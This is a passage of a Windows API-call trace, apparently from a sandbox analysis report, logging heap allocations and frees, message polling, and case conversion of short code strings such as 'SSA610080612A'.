phProv=0x8befe0*=0xad2be8) returned 1 [0261.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.043] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.044] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0261.045] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.045] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.045] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.046] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0261.046] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.046] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0261.046] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.046] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.046] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.046] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.047] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0261.047] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.047] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.047] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.047] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.048] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0261.048] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0261.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0261.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.048] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0261.048] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0261.048] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.048] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.049] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.049] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.049] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.050] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.050] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.050] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0261.050] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.050] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.050] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0261.050] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.050] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.051] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0261.051] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.051] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.051] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.051] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.051] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.052] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0261.052] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.052] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0261.052] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.052] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.052] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0261.052] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.052] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0261.053] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.053] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.053] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.053] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.053] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0261.054] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.054] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.054] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.054] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.054] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0261.054] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.055] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.055] 